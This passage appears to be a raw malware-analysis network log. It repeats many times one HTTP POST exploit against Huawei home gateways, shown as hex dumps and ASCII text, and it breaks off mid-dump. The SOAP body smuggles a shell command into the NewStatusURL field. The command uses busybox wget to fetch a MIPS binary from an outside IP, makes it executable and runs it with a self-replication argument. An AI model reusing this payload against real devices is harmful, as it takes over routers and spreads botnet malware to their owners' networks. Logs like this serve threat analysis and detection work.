35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 